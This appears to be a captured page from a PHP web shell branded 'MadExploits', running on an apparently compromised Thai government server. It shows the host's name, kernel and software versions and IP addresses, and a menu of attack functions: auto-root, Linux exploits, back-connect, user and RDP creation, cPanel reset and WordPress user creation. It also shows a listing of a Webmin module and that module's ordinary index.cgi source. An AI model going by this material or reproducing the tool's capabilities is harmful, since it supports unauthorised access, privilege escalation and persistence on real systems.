Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
cluster-passwd /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
128
B
-rw-r--r--
acl_security.pl
3.62
KB
-rwxr-xr-x
change-passwd.pl
1.84
KB
-rwxr-xr-x
cluster-passwd-lib.pl
4.09
KB
-rwxr-xr-x
config
39
B
-rw-r--r--
config.info
160
B
-rw-r--r--
config.info.ca
188
B
-rw-r--r--
config.info.ca.UTF-8
190
B
-rw-r--r--
config.info.cz
187
B
-rw-r--r--
config.info.cz.UTF-8
206
B
-rw-r--r--
config.info.de
163
B
-rw-r--r--
config.info.de.UTF-8
163
B
-rw-r--r--
config.info.el
188
B
-rw-r--r--
config.info.es
220
B
-rw-r--r--
config.info.es.UTF-8
220
B
-rw-r--r--
config.info.fr
218
B
-rw-r--r--
config.info.fr.UTF-8
220
B
-rw-r--r--
config.info.hr
0
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ms
185
B
-rw-r--r--
config.info.ms.UTF-8
185
B
-rw-r--r--
config.info.ms_MY
187
B
-rw-r--r--
config.info.ms_MY.UTF-8
187
B
-rw-r--r--
config.info.nl
181
B
-rw-r--r--
config.info.nl.UTF-8
181
B
-rw-r--r--
config.info.no
174
B
-rw-r--r--
config.info.no.UTF-8
174
B
-rw-r--r--
config.info.pl
203
B
-rw-r--r--
config.info.pl.UTF-8
214
B
-rw-r--r--
defaultacl
64
B
-rw-r--r--
edit_passwd.cgi
1.45
KB
-rwxr-xr-x
index.cgi
1.65
KB
-rwxr-xr-x
log_parser.pl
447
B
-rwxr-xr-x
module.info
205
B
-rw-r--r--
module.info.ca
124
B
-rw-r--r--
module.info.ca.UTF-8
139
B
-rw-r--r--
module.info.cz
30
B
-rw-r--r--
module.info.cz.UTF-8
37
B
-rw-r--r--
module.info.de
114
B
-rw-r--r--
module.info.de.UTF-8
126
B
-rw-r--r--
module.info.es
45
B
-rw-r--r--
module.info.es.UTF-8
51
B
-rw-r--r--
module.info.fr
50
B
-rw-r--r--
module.info.fr.UTF-8
56
B
-rw-r--r--
module.info.hu
37
B
-rw-r--r--
module.info.hu.UTF-8
46
B
-rw-r--r--
module.info.ms
37
B
-rw-r--r--
module.info.ms.UTF-8
43
B
-rw-r--r--
module.info.ms_MY
124
B
-rw-r--r--
module.info.ms_MY.UTF-8
136
B
-rw-r--r--
module.info.nl
38
B
-rw-r--r--
module.info.nl.UTF-8
44
B
-rw-r--r--
module.info.no
31
B
-rw-r--r--
module.info.no.UTF-8
37
B
-rw-r--r--
module.info.pl
107
B
-rw-r--r--
module.info.pl.UTF-8
124
B
-rw-r--r--
save_passwd.cgi
1.65
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Show a list of all users whose passwords can be changed require './cluster-passwd-lib.pl'; # Check if cluster-useradmin is set up @hosts = &cluster_useradmin::list_useradmin_hosts(); if (!@hosts) { &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1); &ui_print_endpage(&text('index_noservers', "../cluster-useradmin/")); } @ulist = grep { &can_edit_passwd($_) } &get_all_users(\@hosts); if (@ulist == 1) { # Can only edit one user, so re-direct to editing form &redirect("edit_passwd.cgi?user=$ulist[0]->{'user'}&one=1"); } &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1); if ($config{'sort_mode'}) { @ulist = sort { lc($a->{'user'}) cmp lc($b->{'user'}) } @ulist; } print &text('index_hosts', scalar(@hosts)),"<p>\n"; if ($config{'max_users'} && @ulist > $config{'max_users'}) { # Show as form for entering a username print "$passwd::text{'index_toomany'}<br>\n"; print &ui_form_start("edit_passwd.cgi"); print &ui_submit($passwd::text{'index_user'}); if ($config{'input_type'}) { print &ui_select("user", undef, [ map { [ $_->{'user'} ] } @ulist ]); } else { print &ui_user_textbox("user"); } print &ui_form_end(); } else { # Show as table of users print &ui_table_start($passwd::text{'index_header'}, "width=100%"); for($i=0; $i<@ulist; $i++) { if ($i%4 == 0) { print "<tr>\n"; } print "<td width=25%><a href=\"edit_passwd.cgi?", "user=$ulist[$i]->{'user'}\">", &html_escape($ulist[$i]->{'user'})."</a></td>\n"; if ($i%4 == 3) { print "</tr>\n"; } } while($i++ % 4) { print "<td width=25%></td>\n"; } print &ui_table_end(); } &ui_print_footer("/", $text{'index'});
Close